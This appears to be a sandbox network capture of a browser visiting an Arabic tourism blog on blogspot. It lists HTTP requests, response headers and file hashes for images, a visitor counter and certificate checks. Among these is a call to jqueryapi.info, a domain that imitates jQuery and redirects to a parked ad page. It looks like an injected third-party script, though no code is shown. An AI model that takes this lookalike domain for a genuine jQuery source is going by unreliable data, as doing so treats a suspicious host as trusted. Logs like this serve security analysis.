HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "va6"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="200.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 4162
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   4162
Md5:    c222294180a2690e9f2122fe45c8c312
Sha1:   1a5171f7523c1d4b5f2d01260748f853ae32cf9a
Sha256: 136f3caed8a212b7195a9439f874d5f7f6943aebd7909e79cdf4e39e8290f69c
                                        
                                            GET /-rUsHLKW-UV4/VWgANJbrw2I/AAAAAAAAAdI/qI8PcrbJzBs/s72-c/Karta_DesertCastles.PNG HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v1d3"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="Karta_DesertCastles.PNG"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 4184
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   4184
Md5:    ee1e16508340c133767277b9554390f8
Sha1:   0c6ea5e69716d1df95cb935cc17e42d73370dd7b
Sha256: 324a7ef34f134d5726aab3e6a9f891024346f83ee5e395534d127f0f8ae7a2ab
                                        
                                            GET /-laQtkxzoMpI/VU7MkKuBhSI/AAAAAAAAAXE/h7dXLSc0XsM/s72-c/NUEJEUS.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v172"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="NUEJEUS.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 2787
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2787
Md5:    50534c7912cb10dc54ab0e12492f0847
Sha1:   142d22e6030c78d39e4a898e90d70133f8d00704
Sha256: 1ed8ac4e31e4f2a8e020128421359df24d874d26d0cb4af2d1569f454187defd
                                        
                                            GET /-uynxSqn0SJA/VRmerYKoH1I/AAAAAAAAAIE/0rK0umbZgdc/s72-c/300.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v82"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="300.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 4288
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   4288
Md5:    bdea661221771cf0e2a4bf98a6b9e000
Sha1:   1a3c885d0ffc80a90cbc093c84d3e44f4c03f7bc
Sha256: 37ff8eb8107b552f491093a15ee41de21eec4abdc679060342ccbfd7bdb35620
                                        
                                            GET /-xKvN_tcqIhU/VRmPQz1zilI/AAAAAAAAAHk/jpEwU9kN3Ug/s72-c/100.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v7a"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="100.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 3408
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3408
Md5:    c6217eb28b53945548a1fc30db0bffbc
Sha1:   61eb72be0ea214a103d8ab412a9c84b5cfae9567
Sha256: 7eda15fdbe97855c0aad704e8209ed823f85a17da483e27405920b5ffabe6ba7
                                        
                                            GET /-R_Ek8Ll2vT4/VRrXGsDkQaI/AAAAAAAAAJc/DmVSiVosJQA/s72-c/1144.png HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/png
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v98"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="1144.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 8004
X-XSS-Protection: 0


--- Additional Info ---
Magic:  PNG image data, 72 x 72, 8-bit/color RGB, non-interlaced\012- data
Size:   8004
Md5:    19be1670097f7866c732b14686093df8
Sha1:   0979c9f132649efd3b6bb3eba3af2c189d854e3f
Sha256: cf13446b5a3e77b05009ff875b551c30b2feabbfc677e9e118eb84fa807dd6e6
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: JOtIGdybHGV7XJcv1huQCA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                        
                                             52.42.74.230
HTTP/1.1 101 Switching Protocols
                                            
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 2gFHeymrjRP6pCHCmX3lLRfYLHg=

                                        
                                            GET /-tSoKAlCvec0/VRxLRp2DA3I/AAAAAAAAALA/vpFeYuE2s1U/s72-c/3232.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "vb1"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="3232.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 3877
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3877
Md5:    fea66a6dacc40554cc149d7c94cf3246
Sha1:   6baa6a18a0aa5a0bb6f6e297ff4fc8bc8d49c2d2
Sha256: bd4a6699c97cc760c3310f5df58b94d87292eef7442741bb5d5b501ebaff3bde
                                        
                                            GET /-nNaSTKXMldg/VYD8x9wEBlI/AAAAAAAAAhI/M2WnOKW3xqI/s72-c/cistern-nabataean-petra.jpg HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "v213"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="cistern-nabataean-petra.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 2021
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   2021
Md5:    108a2a23c123973962afc7f3e2312843
Sha1:   fc90bc30dd91c7ea7c0986e327fcd14e0f5338cf
Sha256: 2ad07bf9206cd9e73db7279eeb9ffb4d19d5ff8d652ca26a1fbd3af23f8eac62
                                        
                                            GET /-L7_WrmloT78/VSbJdcpuCqI/AAAAAAAAAOc/1DsKvs-Xeps/s72-c/DSC00618.JPG HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                            
Access-Control-Expose-Headers: Content-Length
ETag: "ve8"
Expires: Tue, 29 Nov 2022 11:29:38 GMT
Cache-Control: public, max-age=86400, no-transform
Content-Disposition: inline;filename="DSC00618.JPG"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Mon, 28 Nov 2022 11:29:38 GMT
Server: fife
Content-Length: 3006
X-XSS-Protection: 0


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 72x72, components 3\012- data
Size:   3006
Md5:    a4cdc3e14d5df4c0e9244b555554e50f
Sha1:   6941172ce930a7b5fdeb92c0e901309bb5964548
Sha256: 29cc21e8096658f19a1c57ee1f806026cdac3ca74891b710fb41631df5c0db48
                                        
                                            GET /?getsrc=ok&ref=&url=http%3A%2F%2Falraush.blogspot.com%2F2015%2F05%2Fblog-post-artimes-jarash-temple.html HTTP/1.1 
Host: jqueryapi.info
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             45.56.79.23
HTTP/1.1 302 Found
content-type: text/html; charset=utf-8
                                            
server: openresty/1.13.6.1
date: Mon, 28 Nov 2022 11:29:38 GMT
content-length: 0
location: http://www6.jqueryapi.info/?template=ARROW_3&tdfs=1&s_token=1669634978.0498440000&uuid=1669634978.0498440000&term=Javascript%20Image%20Annotation%20Library&term=Online%20Programming%20Courses&term=Coding%20Certification%20Programs&term=Ethical%20Cracking%20and%20Penetration%20Testing&searchbox=0&showDomain=0&backfill=0
x-mtm-path: 0
vary: Accept-Language
content-language: en
set-cookie: mtm_delivered=WyJqcXVlcnlhcGkuaW5mbyIsImh0dHA6Ly93d3c2LmpxdWVyeWFwaS5pbmZvLz90ZW1wbGF0ZT1BUlJPV18zJnRkZnM9MSZzX3Rva2VuPTE2Njk2MzQ5NzguMDQ5ODQ0MDAwMCZ1dWlkPTE2Njk2MzQ5NzguMDQ5ODQ0MDAwMCZ0ZXJtPUphdmFzY3JpcHQlMjBJbWFnZSUyMEFubm90YXRpb24lMjBMaWJyYXJ5JnRlcm09T25saW5lJTIwUHJvZ3JhbW1pbmclMjBDb3Vyc2VzJnRlcm09Q29kaW5nJTIwQ2VydGlmaWNhdGlvbiUyMFByb2dyYW1zJnRlcm09RXRoaWNhbCUyMENyYWNraW5nJTIwYW5kJTIwUGVuZXRyYXRpb24lMjBUZXN0aW5nJnNlYXJjaGJveD0wJnNob3dEb21haW49MCZiYWNrZmlsbD0wIiwxLCIyMDIyLTExLTI4IDExOjI5OjM4IiwxLCIxNjY5NjM0OTc4LjA0OTg0NDAwMDAiLDc0LG51bGwsbnVsbF0:1ozcKQ:Q2EdjmzbUSwGAFVwhmuNMqr-hNk; expires=Mon, 28-Nov-2022 12:29:38 GMT; Max-Age=3600; Path=/
connection: close

                                        
                                            GET /classic.js HTTP/1.1 
Host: widgets.amung.us
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             172.67.8.141
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                            
Date: Mon, 28 Nov 2022 11:29:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
last-modified: Fri, 11 Nov 2022 22:14:40 GMT
etag: W/"636ec950-32c5"
expires: Tue, 29 Nov 2022 11:16:22 GMT
cache-control: max-age=86400
access-control-allow-origin: *
content-encoding: gzip
CF-Cache-Status: HIT
Age: 796
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7712c459392db51b-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (12997), with no line terminators
Size:   6796
Md5:    e6dbc3810ce88a15b6dd7bf36f944fcd
Sha1:   e992835d614158a4762a4cf35a49b42ed5cd2504
Sha256: 1622c30705591416867c1b55975a1bc66a59746216db9e3bcd76339f372d6604
                                        
                                            GET /?template=ARROW_3&tdfs=1&s_token=1669634978.0498440000&uuid=1669634978.0498440000&term=Javascript%20Image%20Annotation%20Library&term=Online%20Programming%20Courses&term=Coding%20Certification%20Programs&term=Ethical%20Cracking%20and%20Penetration%20Testing&searchbox=0&showDomain=0&backfill=0 HTTP/1.1 
Host: www6.jqueryapi.info
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://alraush.blogspot.com/
Connection: keep-alive

                                        
                                             35.186.238.101
HTTP/1.1 200 OK
Content-Type: text/html
                                            
Server: openresty
Date: Mon, 28 Nov 2022 11:29:38 GMT
Content-Length: 2551
Last-Modified: Sun, 27 Nov 2022 01:57:20 GMT
ETag: "6382c400-9f7"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aFezoOoNvCLU/axcF5mC9q0qqDMGfrtIC9d9yz2YWAmMEkiHMOMvVl5E9+MjWIBkLXT5wT8y/EUBG3FGntrJgw
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=91.90.42.154;Path=/;Max-Age=86400; country=NO;Path=/;Max-Age=86400; city="";Path=/;Max-Age=86400; expiry_partner=;Path=/;Max-Age=86400;
Accept-Ranges: bytes
Via: 1.1 google


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2551), with no line terminators
Size:   2551
Md5:    41f66bb0ac50f2d851236170e7c71341
Sha1:   59bcec216302151922219b51be8ad8ab6d0b8384
Sha256: ec99cca58b612ce268e6ada818dfcec0acc22dd1bbe372487be9abbdd07ce073
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: alraush.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/2015/05/blog-post-artimes-jarash-temple.html

                                        
                                             142.250.74.161
HTTP/1.1 200 OK
Content-Type: image/x-icon; charset=UTF-8
                                            
Expires: Mon, 28 Nov 2022 11:29:38 GMT
Date: Mon, 28 Nov 2022 11:29:38 GMT
Cache-Control: private, max-age=86400
Last-Modified: Tue, 08 Nov 2022 01:51:41 GMT
ETag: W/"984ea726cbdb512d848952afd64a47fc0883fb98c63a62134237238b9f1e42c5"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 412
Server: GSE


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 16x16, 8 bits/pixel\012- data
Size:   412
Md5:    501c61a70f5c41181aa050d9110909ca
Sha1:   5b985d5671a7caf686fdfb1df13488c4407f6c9f
Sha256: c4aaf001607ee331f6871b4dbbf45942b1e197726714fd106e46d70cc10ee97e
                                        
                                            GET /pingjs/?k=1jc22x5hkef1&t=%D8%B5%D9%81%D8%AD%D8%A9%20%D8%AE%D8%B7%D8%A3%20-%20%D8%B3%D9%8A%D8%A7%D8%AD%D8%A9%20%D9%83%D9%88%D9%85&c=c&x=http%3A%2F%2Falraush.blogspot.com%2F2015%2F05%2Fblog-post-artimes-jarash-temple.html&y=&a=0&d=1.155&v=27&r=9186 HTTP/1.1 
Host: whos.amung.us
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://alraush.blogspot.com/

                                        
                                             104.22.74.171
HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
                                            
Date: Mon, 28 Nov 2022 11:29:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
content-encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7712c45a59060a24-ARN


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   48
Md5:    9ab19c21c3d95d70e58bf2099332622d
Sha1:   24c25708e61c8395eba69c3d835c0a45473603f9
Sha256: 7c514df201f39e49a67342a63aa5099e441ec023dadde914fdf56d0b04b10cb2
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Server: nginx
Content-Length: 503
ETag: "BD123FE3FCE93216E2635F9DBC356F081B7599784FB6B67984032F11D82BC7CB"
Last-Modified: Sat, 26 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10507
Expires: Mon, 28 Nov 2022 14:24:46 GMT
Date: Mon, 28 Nov 2022 11:29:39 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Server: nginx
Content-Length: 503
ETag: "BD123FE3FCE93216E2635F9DBC356F081B7599784FB6B67984032F11D82BC7CB"
Last-Modified: Sat, 26 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10507
Expires: Mon, 28 Nov 2022 14:24:46 GMT
Date: Mon, 28 Nov 2022 11:29:39 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Server: nginx
Content-Length: 503
ETag: "BD123FE3FCE93216E2635F9DBC356F081B7599784FB6B67984032F11D82BC7CB"
Last-Modified: Sat, 26 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10507
Expires: Mon, 28 Nov 2022 14:24:46 GMT
Date: Mon, 28 Nov 2022 11:29:39 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                        
                                             23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                            
Server: nginx
Content-Length: 503
ETag: "BD123FE3FCE93216E2635F9DBC356F081B7599784FB6B67984032F11D82BC7CB"
Last-Modified: Sat, 26 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=10507
Expires: Mon, 28 Nov 2022 14:24:46 GMT
Date: Mon, 28 Nov 2022 11:29:39 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f2e6328-f3c1-4a69-b0b6-73920b885144.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 8885
x-amzn-requestid: 71b8367f-f79f-42a7-bcb8-c441a154babf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cGDTEFSeIAMF3rg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637f18e0-631b775d3430a8c30c3b4420;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 07:10:24 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: jsmd6yxjJxLMEgv1jDa87iEoZXL2OuALsmUZ9Nxx1rUN-xOTdtN1-A==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 559326ad73233233a9e52cb9e8601ede.cloudfront.net (CloudFront), 1.1 google
date: Mon, 28 Nov 2022 10:13:33 GMT
age: 4566
etag: "70c2a238f06ca7e56ef80c83738e081bf0de3330"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8885
Md5:    3a1a4e00f1f15827cf651f373863c379
Sha1:   70c2a238f06ca7e56ef80c83738e081bf0de3330
Sha256: 3d936e1f0c96297f121faece12d6f8173e12eed5087165cd4eefc0fab368419f
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ffa0bb072-3065-47f5-88ac-e3977adf0cba.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
                                             34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                            
server: nginx
content-length: 3532
x-amzn-requestid: 12f95833-5aca-4633-8eac-011f194953ff
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cJWisFi5IAMFgCQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63806add-77d024405c7fe57124c4ae1c;Sampled=0
x-amzn-remapped-date: Fri, 25 Nov 2022 07:12:29 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: FfwgJjX9r1rqeeN9Va2apka3gXe6L610KxF8UHT5AzbM-wZtMqQDBA==
via: 1.1 446313511980eb02f28ff5a9a4147c0a.cloudfront.net (CloudFront), 1.1 64f86ae1c24221f3a2e4d653d6dbc416.cloudfront.net (CloudFront), 1.1 google
date: Mon, 28 Nov 2022 05:33:40 GMT
age: 21359
etag: "cd268c0301ee9ec2de1aaaf5fff3efede4973916"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3532
Md5:    f7d70dfcfffed4941f9766906c52776c
Sha1:   cd268c0301ee9ec2de1aaaf5fff3efede4973916
Sha256: 024dcb67aca1c6491ca045b1384b623ff934362b77bac2916ad2744e5c6c4bd2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F36d8942f-c540-4112-a5a9-c7ac53a00a23.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                        
